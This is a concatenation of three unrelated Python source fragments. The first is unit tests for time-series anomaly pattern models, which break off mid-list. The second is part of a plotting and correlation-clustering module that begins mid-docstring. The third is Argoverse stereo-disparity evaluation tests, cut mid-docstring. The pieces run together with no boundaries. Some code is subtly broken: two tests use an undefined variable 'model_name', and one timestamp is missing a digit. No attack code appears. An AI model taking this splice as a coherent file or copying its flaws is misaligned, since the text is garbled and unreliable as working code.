import unittest import pandas as pd import numpy as np from utils import prepare_data import models import random import scipy.signal from typing import List from analytic_types.segment import Segment class TestDataset(unittest.TestCase): def test_models_with_corrupted_dataframe(self): data = [[1523889000000 + i, float('nan')] for i in range(10)] dataframe = pd.DataFrame(data, columns=['timestamp', 'value']) segments = [] model_instances = [ models.JumpModel(), models.DropModel(), models.GeneralModel(), models.PeakModel(), models.TroughModel() ] for model in model_instances: model_name = model.__class__.__name__ model.state = model.get_state(None) with self.assertRaises(AssertionError): model.fit(dataframe, segments, 'test') def test_peak_antisegments(self): data_val = [1.0, 1.0, 1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 1.0, 1.0, 5.0, 7.0, 5.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000010, 'to': 1523889000012, 'labeled': True, 'deleted': False}, {'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000003, 'to': 1523889000005, 'labeled': False, 'deleted': True}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.PeakModel() model_name = model.__class__.__name__ model.state = model.get_state(None) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_jump_antisegments(self): data_val = [1.0, 1.0, 1.0, 1.0, 1.0, 5.0, 5.0, 5.0, 5.0, 1.0, 1.0, 1.0, 1.0, 9.0, 9.0, 9.0, 9.0, 9.0, 1.0, 1.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000010, 'to': 1523889000016, 'labeled': True, 'deleted': False}, {'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000002, 'to': 1523889000008, 'labeled': False, 'deleted': True}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.JumpModel() model_name = model.__class__.__name__ model.state = model.get_state(None) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_trough_antisegments(self): data_val = [9.0, 9.0, 9.0, 9.0, 7.0, 4.0, 7.0, 9.0, 9.0, 9.0, 5.0, 1.0, 5.0, 9.0, 9.0, 9.0, 9.0, 9.0, 9.0, 9.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000010, 'to': 1523889000012, 'labeled': True, 'deleted': False}, {'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000003, 'to': 1523889000005, 'labeled': False, 'deleted': True}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.TroughModel() model_name = model.__class__.__name__ model.state = model.get_state(None) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_drop_antisegments(self): data_val = [9.0, 9.0, 9.0, 9.0, 9.0, 5.0, 5.0, 5.0, 5.0, 9.0, 9.0, 9.0, 9.0, 1.0, 1.0, 1.0, 1.0, 1.0, 9.0, 9.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000010, 'to': 1523889000016, 'labeled': True, 'deleted': False}, {'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000002, 'to': 1523889000008, 'labeled': False, 'deleted': True}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.DropModel() model_name = model.__class__.__name__ model.state = model.get_state(None) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_general_antisegments(self): data_val = [1.0, 2.0, 1.0, 2.0, 5.0, 6.0, 3.0, 2.0, 1.0, 1.0, 8.0, 9.0, 8.0, 1.0, 2.0, 3.0, 2.0, 1.0, 1.0, 2.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000010, 'to': 1523889000012, 'labeled': True, 'deleted': False}, {'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000003, 'to': 1523889000005, 'labeled': False, 'deleted': True}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.GeneralModel() model_name = model.__class__.__name__ model.state = model.get_state(None) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_jump_empty_segment(self): data_val = [1.0, 1.0, 1.0, 1.0, 1.0, 5.0, 5.0, 5.0, 5.0, 1.0, 1.0, 1.0, 1.0, 9.0, 9.0, 9.0, 9.0, 0, 0, 0, 0, 0, 0, 0, 0, 0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000019, 'to': 1523889000025, 'labeled': True, 'deleted': False}, {'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000002, 'to': 1523889000008, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.JumpModel() model_name = model.__class__.__name__ model.state = model.get_state(None) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_drop_empty_segment(self): data_val = [1.0, 1.0, 1.0, 1.0, 1.0, 5.0, 5.0, 5.0, 5.0, 1.0, 1.0, 1.0, 1.0, 9.0, 9.0, 9.0, 9.0, 0, 0, 0, 0, 0, 0, 0, 0, 0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000019, 'to': 1523889000025, 'labeled': True, 'deleted': False}, {'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000002, 'to': 1523889000008, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.DropModel() model.state = model.get_state(None) model_name = model.__class__.__name__ model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_value_error_dataset_input_should_have_multiple_elements(self): data_val = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 5.0, 5.0, 4.0, 5.0, 5.0, 6.0, 5.0, 1.0, 2.0, 3.0, 4.0, 5.0,3.0,3.0,2.0,7.0,8.0,9.0,8.0,7.0,6.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000007, 'to': 1523889000011, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.JumpModel() model.state = model.get_state(None) model_name = model.__class__.__name__ model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_prepare_data_for_nonetype(self): data = [[1523889000000, None], [1523889000001, None], [1523889000002, None]] try: data = prepare_data(data) except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_prepare_data_for_nan(self): data = [[1523889000000, np.nan], [1523889000001, np.nan], [1523889000002, np.nan]] try: data = prepare_data(data) except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_prepare_data_output_fon_nan(self): data_nan = [[1523889000000, np.nan], [1523889000001, np.nan], [1523889000002, np.nan]] data_none = [[1523889000000, None], [1523889000001, None], [1523889000002, None]] return_data_nan = prepare_data(data_nan) return_data_none = prepare_data(data_none) for item in return_data_nan.value: self.assertTrue(np.isnan(item)) for item in return_data_none.value: self.assertTrue(np.isnan(item)) def test_three_value_segment(self): data_val = [1.0, 1.0, 1.0, 1.0, 1.0, 5.0, 2.0, 5.0, 5.0, 1.0, 1.0, 1.0, 1.0, 9.0, 9.0, 9.0, 9.0, 2.0, 3.0, 4.0, 5.0, 4.0, 2.0, 1.0, 3.0, 4.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000004, 'to': 1523889000006, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] model_instances = [ models.GeneralModel(), models.PeakModel(), ] try: for model in model_instances: model_name = model.__class__.__name__ model.state = model.get_state(None) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_general_for_two_labeling(self): data_val = [1.0, 2.0, 5.0, 2.0, 1.0, 1.0, 3.0, 6.0, 4.0, 2.0, 1.0, 0, 0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000001, 'to': 1523889000003, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] model = models.GeneralModel() model.state = model.get_state(None) model.fit(dataframe, segments,'test') result = len(data_val) + 1 for _ in range(2): model.do_detect(dataframe) max_pattern_index = max(model.do_detect(dataframe)) self.assertLessEqual(max_pattern_index[0], result) def test_peak_model_for_cache(self): cache = { 'patternCenter': [1, 6], 'patternModel': [1, 4, 0], 'confidence': 2, 'convolveMax': 8, 'convolveMin': 7, 'windowSize': 1, 'convDelMin': 0, 'convDelMax': 0, 'heightMax': 4, 'heightMin': 4, } data_val = [2.0, 5.0, 1.0, 1.0, 1.0, 2.0, 5.0, 1.0, 1.0, 2.0, 3.0, 7.0, 1.0, 1.0, 1.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000010, 'to': 1523889000012, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] model = models.PeakModel() model.state = model.get_state(cache) result = model.fit(dataframe, segments, 'test') self.assertEqual(len(result.pattern_center), 3) def test_trough_model_for_cache(self): cache = { 'patternCenter': [2, 6], 'patternModel': [5, 0.5, 4], 'confidence': 2, 'convolveMax': 8, 'convolveMin': 7, 'window_size': 1, 'convDelMin': 0, 'convDelMax': 0, } data_val = [5.0, 5.0, 1.0, 4.0, 5.0, 5.0, 0.0, 4.0, 5.0, 5.0, 6.0, 1.0, 5.0, 5.0, 5.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000010, 'to': 1523889000012, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] model = models.TroughModel() model.state = model.get_state(cache) result = model.fit(dataframe, segments, 'test') self.assertEqual(len(result.pattern_center), 3) def test_jump_model_for_cache(self): cache = { 'patternCenter': [2, 6], 'patternModel': [5, 0.5, 4], 'confidence': 2, 'convolveMax': 8, 'convolveMin': 7, 'window_size': 1, 'convDelMin': 0, 'convDelMax': 0, } data_val = [1.0, 1.0, 1.0, 4.0, 4.0, 0.0, 0.0, 5.0, 5.0, 0.0, 0.0, 4.0, 4.0, 4.0, 4.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 152388900009, 'to': 1523889000013, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] model = models.JumpModel() model.state = model.get_state(cache) result = model.fit(dataframe, segments, 'test') self.assertEqual(len(result.pattern_center), 3) def test_models_for_pattern_model_cache(self): cache = { 'patternCenter': [4, 12], 'patternModel': [], 'confidence': 2, 'convolveMax': 8, 'convolveMin': 7, 'window_size': 2, 'convDelMin': 0, 'convDelMax': 0, } data_val = [5.0, 5.0, 5.0, 5.0, 1.0, 1.0, 1.0, 1.0, 9.0, 9.0, 9.0, 9.0, 0, 0, 0, 0, 0, 0, 6.0, 6.0, 6.0, 1.0, 1.0, 1.0, 1.0, 1.0] dataframe = create_dataframe(data_val) segments = [{'_id': 'Esl7uetLhx4lCqHa', 'analyticUnitId': 'opnICRJwOmwBELK8', 'from': 1523889000019, 'to': 1523889000024, 'labeled': True, 'deleted': False}] segments = [Segment.from_json(segment) for segment in segments] try: model = models.DropModel() model_name = model.__class__.__name__ model.state = model.get_state(cache) model.fit(dataframe, segments, 'test') except ValueError: self.fail('Model {} raised unexpectedly'.format(model_name)) def test_problem_data_for_random_model(self): problem_data = [2.0, 3.0, 3.0, 3.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0,
num_plots: number of plots :param num_cols: number of columns to use in the subplot :param y_scale: the height of each plot. If `None`, the size of the whole figure equals the default `figsize` :param sharex: unify x-axis if True :param sharey: unify y-axis if True :param exclude_empty: whether to exclude plots of empty series """ if exclude_empty: non_empty_dict_ = { key: val for key, val in dict_.items() if not val.empty } if len(non_empty_dict_) < len(dict_): excluded_series = set(dict_).difference(non_empty_dict_) _LOG.warning("Excluded empty series: %s", excluded_series) dict_ = non_empty_dict_ num_plots = num_plots or len(dict_) if axes is None: # Create figure to accommodate plots. num_cols = num_cols or 2 _, axes = get_multiple_plots( num_plots=num_plots, num_cols=num_cols, y_scale=y_scale, sharex=sharex, sharey=sharey, ) else: dbg.dassert_eq(len(axes), num_plots) # Select first `num_plots` series in the dict and plot them. keys_to_draw = list(dict_.keys())[:num_plots] for i, key in enumerate(keys_to_draw): srs = dict_[key] srs.to_frame().plot(title=key, ax=axes[i]) def plot_histograms_and_lagged_scatterplot( srs: pd.Series, lag: int, oos_start: Optional[str] = None, nan_mode: Optional[str] = None, title: Optional[str] = None, figsize: Optional[Tuple] = None, hist_kwargs: Optional[Any] = None, scatter_kwargs: Optional[Any] = None, axes: Optional[List[mpl.axes.Axes]] = None, ) -> None: """ Plot histograms and scatterplot to test stationarity visually. Function plots histograms with density plot for 1st and 2nd part of the time series (splitted by oos_start if provided otherwise to two equal halves). If the timeseries is stationary, the histogram of the 1st part of the timeseries would be similar to the histogram of the 2nd part) and scatter-plot of time series observations versus their lagged values (x_t versus x_{t - lag}). If it is stationary the scatter-plot with its lagged values would resemble a circular cloud. :param axes: flat list of axes or `None` """ dbg.dassert(isinstance(srs, pd.Series), "Input must be Series") dbg.dassert_monotonic_index(srs, "Index must be monotonic") hist_kwargs = hist_kwargs or {} scatter_kwargs = scatter_kwargs or {} # Handle inf and nan. srs = srs.replace([-np.inf, np.inf], np.nan) nan_mode = nan_mode or "drop" srs = hdataf.apply_nan_mode(srs, mode=nan_mode) # Divide timeseries to two parts. oos_start = oos_start or srs.index.tolist()[len(srs) // 2] srs_first_part = srs[:oos_start] srs_second_part = srs[oos_start:] # Plot histograms. if axes is None: _, axes = get_multiple_plots(3, 2, y_scale=figsize[1] / 2) plt.suptitle(title or srs.name) sns.histplot( srs_first_part, ax=axes[0], kde=True, stat="probability", **hist_kwargs ) axes[0].set(xlabel=None, ylabel=None, title="Sample distribution split 1") sns.histplot( srs_second_part, ax=axes[1], kde=True, stat="probability", **hist_kwargs, ) axes[1].set(xlabel=None, ylabel=None, title="Sample distribution split 2") # Plot scatter plot. axes[2].scatter(srs, srs.shift(lag), **scatter_kwargs) axes[2].set(xlabel="Values", ylabel="Values with lag={}".format(lag)) axes[2].axis("equal") axes[2].set_title("Scatter-plot with lag={}".format(lag)) # ############################################################################# # Correlation-type plots # ############################################################################# def plot_heatmap( corr_df: pd.core.frame.DataFrame, mode: Optional[str] = None, annot: Union[bool, str] = "auto", figsize: Optional[Tuple[int, int]] = None, title: Optional[str] = None, vmin: float = -1.0, vmax: float = 1.0, ax: Optional[mpl.axes.Axes] = None, ) -> None: """ Plot a heatmap for a corr / cov df. :param corr_df: df to plot a heatmap :param mode: "heatmap_semitriangle", "heatmap" or "clustermap" :param annot: determines whether to use annotations :param figsize: if nothing specified, basic (20,5) used :param title: title for the plot :param vmin: minimum value to anchor the colormap :param vmax: maximum value to anchor the colormap :param ax: axes in which to draw the plot """ figsize = figsize or FIG_SIZE # Sanity check. if corr_df.empty: _LOG.warning("Can't plot heatmap for empty `corr_df`") return if corr_df.shape[0] > 20: _LOG.warning("The corr_df.shape[0]='%s' > 20", corr_df.shape[0]) figsize = (figsize[0], figsize[0]) if np.all(np.isnan(corr_df)): _LOG.warning( "Can't plot heatmap with only nans:\n%s", corr_df.to_string() ) return # if annot == "auto": annot = corr_df.shape[0] < 10 # Generate a custom diverging colormap. cmap = _get_heatmap_colormap() mode = mode or "heatmap" if mode in ("heatmap", "heatmap_semitriangle"): # Set up the matplotlib figure. if ax is None: _, ax = plt.subplots(figsize=figsize) mask = _get_heatmap_mask(corr_df, mode) sns.heatmap( corr_df, cmap=cmap, vmin=vmin, vmax=vmax, # Use correct aspect ratio. square=True, annot=annot, fmt=".2f", cbar_kws={ "shrink": 0.5, "location": "left", "use_gridspec": False, "pad": 0.03, }, mask=mask, ax=ax, ) ax.set_title(title) elif mode == "clustermap": dbg.dassert_is(ax, None) g = sns.clustermap( corr_df, cmap=cmap, vmin=vmin, vmax=vmax, square=True, annot=annot, figsize=figsize, ) g.ax_heatmap.set_title(title) return else: raise RuntimeError("Invalid mode='%s'" % mode) ax.tick_params(axis="y", labelright=True, labelleft=False, labelrotation=0) # TODO(gp): Add an option to mask out the correlation with low pvalues # http://stackoverflow.com/questions/24432101/correlation-coefficients-and-p-values-for-all-pairs-of-rows-of-a-matrix def plot_correlation_matrix( df: pd.core.frame.DataFrame, mode: Optional[str] = None, annot: Union[bool, str] = False, figsize: Optional[Tuple[int, int]] = None, title: Optional[str] = None, method: Optional[str] = None, min_periods: Optional[int] = None, ax: Optional[mpl.axes.Axes] = None, ) -> pd.core.frame.DataFrame: """ Compute correlation matrix and plot its heatmap. :param df: Df to compute correlation matrix and plot a heatmap :param mode: "heatmap_semitriangle", "heatmap" or "clustermap" :param annot: determines whether to use annotations :param figsize: if nothing specified, basic (20,5) used :param title: title for the plot :param method: "pearson", "kendall", "spearman" or callable method of correlation :param min_periods: minimum number of observations required per pair of columns to have a valid result; currently only available for Pearson and Spearman correlation """ if df.empty: _LOG.warning("Skipping correlation matrix since `df` is empty") return None # Compute the correlation matrix. method = method or "pearson" corr_df = df.corr(method=method, min_periods=min_periods) # Plot heatmap. plot_heatmap( corr_df, mode=mode, annot=annot, figsize=figsize, title=title, vmin=-1.0, vmax=1.0, ax=ax, ) return corr_df def display_corr_df(df: pd.core.frame.DataFrame) -> None: """ Display a correlation df with values with 2 decimal places. """ if df is not None: df_tmp = df.applymap(lambda x: "%.2f" % x) cexplo.display_df(df_tmp) else: _LOG.warning("Can't display correlation df since it is None") def compute_linkage(df: pd.DataFrame, method: Optional[str] = None) -> np.ndarray: """ Perform hierarchical clustering. Linkage methods available in the official documentation: https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html :param df: input dataframe with columns as series :method: distance calculation method :returns: hierarchical clustering encoded as a linkage matrix """ method = method or "average" corr = df.corr() return schier.linkage(corr, method=method) def select_series_to_keep(df_corr: pd.DataFrame, threshold: float) -> List[str]: """ Select correlate series to keep. Iterate through the correlation dataframe by picking the time series that has the largest number of coefficients above the correlation threshold. If there are multiple such time series, pick the first one i.e. with the min index. Next, take all the time series that have correlation above the threshold with the selected one and drop them from the correlation matrix. Continue the process on the remaining subset matrix until all of the time series in the remaining matrix have a correlation below the threshold. At this point, stop the process and return the list of time series in the remaining matrix. :param df_corr: dataframe with time series correlations :param threshold: correlation threshold to remove time series :returns: list of series to remove """ corr = df_corr.copy() # Fill diag with 0 to ensure that the correlations of time series with themselves # (i.e. 1.0) are not selected when coefficients compared to the threshold. np.fill_diagonal(corr.values, 0) while True: subset_corr = corr[abs(corr) > threshold] if subset_corr.isnull().values.all(): return list(subset_corr.columns.values) else: column_to_keep = ( subset_corr[abs(subset_corr) > threshold].notnull().sum().idxmax() ) columns_to_remove = subset_corr[ subset_corr[column_to_keep].notnull() ].index corr = subset_corr.drop(columns_to_remove).drop( columns_to_remove, axis=1 ) def cluster_and_select( df: pd.DataFrame, num_clust: int, corr_thr: float = 0.8, show_corr_plots: bool = True, show_dendogram: bool = True, method: Optional[str] = None, ) -> Optional[Dict[str, float]]: """ Select a subset of time series, using clustering and correlation approach. Cluster time series using hierarchical clustering algorithm defined by the linkage matrix. We use compute_linkage() function to compute linkage matrix with the default 'average' method (or the method specified in the input). Once the clusters are formed and each time series is assigned to a specific cluster, the correlations amongst time series produced for every such cluster. The correlation matrix is then passed to select_series_to_remove() method, which returns the list of highly correlated time series within the cluster (above the threshold specified) that are removed from the total list of time series to consider. Once the function iterated over every cluster and removed from the original list of time series, it returns the reduced list of time series with the equivalent amount of information that can be used to consider for further analysis. The function also produces dendogram of clustered time
<reponame>gargrohin/argoverse-api<filename>tests/test_eval_stereo.py<gh_stars>100-1000 # <Copyright 2021, Argo AI, LLC. Released under the MIT license.> """Stereo evaluation unit tests.""" import math from pathlib import Path from argoverse.evaluation.stereo.constants import DEFAULT_ABS_ERROR_THRESHOLDS, DEFAULT_REL_ERROR_THRESHOLDS from argoverse.evaluation.stereo.eval import StereoEvaluator from argoverse.evaluation.stereo.utils import compute_disparity_error _ROOT = Path(__file__).resolve().parent def test_stereo_evaluation() -> None: """Test the stereo evaluation using real predictions and known results.""" pred_dir = Path(f"{_ROOT}/test_data/stereo/prediction/") gt_dir = Path(f"{_ROOT}/test_data/stereo/disparity_maps_v1.1/test/") evaluator = StereoEvaluator( pred_dir, gt_dir, figs_fpath=None, save_disparity_error_image=False, num_procs=1, ) summary = evaluator.evaluate() assert math.isclose(summary["all:10"], 5.446183637) assert math.isclose(summary["fg:10"], 9.600825877) assert math.isclose(summary["bg:10"], 3.556616323) assert math.isclose(summary["all*:10"], 3.811615737) assert math.isclose(summary["fg*:10"], 7.697195243) assert math.isclose(summary["bg*:10"], 1.664911488) assert math.isclose(summary["all:5"], 21.389381959) assert math.isclose(summary["fg:5"], 16.070199587) assert math.isclose(summary["bg:5"], 23.808592221) assert math.isclose(summary["all*:5"], 17.171651915) assert math.isclose(summary["fg*:5"], 14.114550240) assert math.isclose(summary["bg*:5"], 18.860638884) assert math.isclose(summary["all:3"], 29.672960034) assert math.isclose(summary["fg:3"], 18.530626290) assert math.isclose(summary["bg:3"], 34.740590030) assert math.isclose(summary["all*:3"], 24.646294980) assert math.isclose(summary["fg*:3"], 16.61069256) assert math.isclose(summary["bg*:3"], 29.08580311) def test_compute_disparity_error_dummy_1() -> None: """Test the computation of the disparity errors using an exact disparity prediction for background regions only. The computed values are the following: num_pixels_bg: Number of pixels in the background region. num_pixels_fg: Number of pixels in the foreground region. num_pixels_bg_est: Number of pixels in the background region. Counts only the estimated disparities (no interpolation). num_pixels_fg_est: Number of pixels in the foreground region. Counts only the estimated disparities (no interpolation). num_errors_bg:THD: Counts the number of disparity errors (bad pixels) in the background regions using: bad_pixels = (abs_err > abs_error_thresh) & (rel_err > rel_error_thresh), where abs_err = np.abs(pred_disparity - gt_disparity), rel_err = abs_err / gt_disparity, abs_error_thresh (THD) is one of 10, 5, or 3 pixels, and rel_error_thresh is 0.1 (10%). num_errors_fg:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. num_errors_bg_est:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. Counts only the estimated pixels (no interpolation). num_errors_fg_est:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. Counts only the estimated pixels (no interpolation). Dummy test images (3 x 3): pred = np.array([[ 1.0, 5.0, 10.0], [ 50.0, 70.0, 90.0], [100.0, 150.0, 200.0]], dtype=np.float32) gt = np.array([[ 1.0, 5.0, 10.0], [ 50.0, 70.0, 90.0], [100.0, 150.0, 200.0]], dtype=np.float32) gt_obj = np.array([[0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]], dtype=np.float32) pred is the predicted disparity map, gt is the ground-truth disparity map, and gt_obj is the ground-truth disparity map for foreground objects. The dummy data should produce the following results: num_pixels_bg: 9 pixels because the dummy gt disparity map is 3 x 3 and all pixels have valid disparities. num_pixels_fg: 0 pixels because the dummy gt_obj has no foreground objects. num_pixels_bg_est: 9 pixels because the dummy pred disparity map is 3 x 3 and all pixels have valid disparities. num_pixels_fg_est: 0 pixels because the dummy gt_obj has no foreground objects. num_errors_bg:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). num_errors_fg:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). num_errors_bg_est:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). num_errors_fg_est:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). """ gt_fpath = Path(f"{_ROOT}/test_data/stereo/eval_test_cases/dummy_case_1/disparity_gt/disparity_1.png") gt_obj_fpath = Path(f"{_ROOT}/test_data/stereo/eval_test_cases/dummy_case_1/disparity_gt/disparity_objects_1.png") pred_fpath = Path(f"{_ROOT}/test_data/stereo/eval_test_cases/dummy_case_1/disparity_pred/disparity_1.png") errors = compute_disparity_error( pred_fpath, gt_fpath, gt_obj_fpath, figs_fpath=None, abs_error_thresholds=DEFAULT_ABS_ERROR_THRESHOLDS, rel_error_thresholds=DEFAULT_REL_ERROR_THRESHOLDS, save_disparity_error_image=False, ) assert int(errors["num_pixels_bg"]) == 9 assert int(errors["num_pixels_fg"]) == 0 assert int(errors["num_pixels_bg_est"]) == 9 assert int(errors["num_pixels_fg_est"]) == 0 assert int(errors["num_errors_bg:10"]) == 0 assert int(errors["num_errors_fg:10"]) == 0 assert int(errors["num_errors_bg_est:10"]) == 0 assert int(errors["num_errors_fg_est:10"]) == 0 assert int(errors["num_errors_bg:5"]) == 0 assert int(errors["num_errors_fg:5"]) == 0 assert int(errors["num_errors_bg_est:5"]) == 0 assert int(errors["num_errors_fg_est:5"]) == 0 assert int(errors["num_errors_bg:3"]) == 0 assert int(errors["num_errors_fg:3"]) == 0 assert int(errors["num_errors_bg_est:3"]) == 0 assert int(errors["num_errors_fg_est:3"]) == 0 def test_compute_disparity_error_dummy_2() -> None: """Test the computation of the disparity errors using an exact disparity prediction for background and foreground regions. The computed values are the following: num_pixels_bg: Number of pixels in the background region. num_pixels_fg: Number of pixels in the foreground region. num_pixels_bg_est: Number of pixels in the background region. Counts only the estimated disparities (no interpolation). num_pixels_fg_est: Number of pixels in the foreground region. Counts only the estimated disparities (no interpolation). num_errors_bg:THD: Counts the number of disparity errors (bad pixels) in the background regions using: bad_pixels = (abs_err > abs_error_thresh) & (rel_err > rel_error_thresh), where abs_err = np.abs(pred_disparity - gt_disparity), rel_err = abs_err / gt_disparity, abs_error_thresh (THD) is one of 10, 5, or 3 pixels, and rel_error_thresh is 0.1 (10%). num_errors_fg:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. num_errors_bg_est:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. Counts only the estimated pixels (no interpolation). num_errors_fg_est:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. Counts only the estimated pixels (no interpolation). Dummy test images (3 x 3): pred = np.array([[ 1.0, 5.0, 10.0], [ 50.0, 70.0, 90.0], [100.0, 150.0, 200.0]], dtype=np.float32) gt = np.array([[ 1.0, 5.0, 10.0], [ 50.0, 70.0, 90.0], [100.0, 150.0, 200.0]], dtype=np.float32) gt_obj = np.array([[ 1.0, 5.0, 0.0], [50.0, 70.0, 0.0], [ 0.0, 0.0, 0.0]], dtype=np.float32) pred is the predicted disparity map, gt is the ground-truth disparity map, and gt_obj is the ground-truth disparity map for foreground objects. The dummy data should produce the following results: num_pixels_bg: 5 pixels in the background because now there are 4 pixels in the foreground region. num_pixels_fg: 4 pixels in the foreground region. num_pixels_bg_est: 5 pixels in the background because now there are 4 pixels in the foreground region. num_pixels_fg_est: 4 pixels in the foreground region. num_errors_bg:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). num_errors_fg:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). num_errors_bg_est:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). num_errors_fg_est:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). """ gt_fpath = Path(f"{_ROOT}/test_data/stereo/eval_test_cases/dummy_case_2/disparity_gt/disparity_1.png") gt_obj_fpath = Path(f"{_ROOT}/test_data/stereo/eval_test_cases/dummy_case_2/disparity_gt/disparity_objects_1.png") pred_fpath = Path(f"{_ROOT}/test_data/stereo/eval_test_cases/dummy_case_2/disparity_pred/disparity_1.png") errors = compute_disparity_error( pred_fpath, gt_fpath, gt_obj_fpath, figs_fpath=None, abs_error_thresholds=DEFAULT_ABS_ERROR_THRESHOLDS, rel_error_thresholds=DEFAULT_REL_ERROR_THRESHOLDS, save_disparity_error_image=False, ) assert int(errors["num_pixels_bg"]) == 5 assert int(errors["num_pixels_fg"]) == 4 assert int(errors["num_pixels_bg_est"]) == 5 assert int(errors["num_pixels_fg_est"]) == 4 assert int(errors["num_errors_bg:10"]) == 0 assert int(errors["num_errors_fg:10"]) == 0 assert int(errors["num_errors_bg_est:10"]) == 0 assert int(errors["num_errors_fg_est:10"]) == 0 assert int(errors["num_errors_bg:5"]) == 0 assert int(errors["num_errors_fg:5"]) == 0 assert int(errors["num_errors_bg_est:5"]) == 0 assert int(errors["num_errors_fg_est:5"]) == 0 assert int(errors["num_errors_bg:3"]) == 0 assert int(errors["num_errors_fg:3"]) == 0 assert int(errors["num_errors_bg_est:3"]) == 0 assert int(errors["num_errors_fg_est:3"]) == 0 def test_compute_disparity_error_dummy_3() -> None: """Test the computation of the disparity errors using a non-exact disparity prediction for background regions only. The computed values are the following: 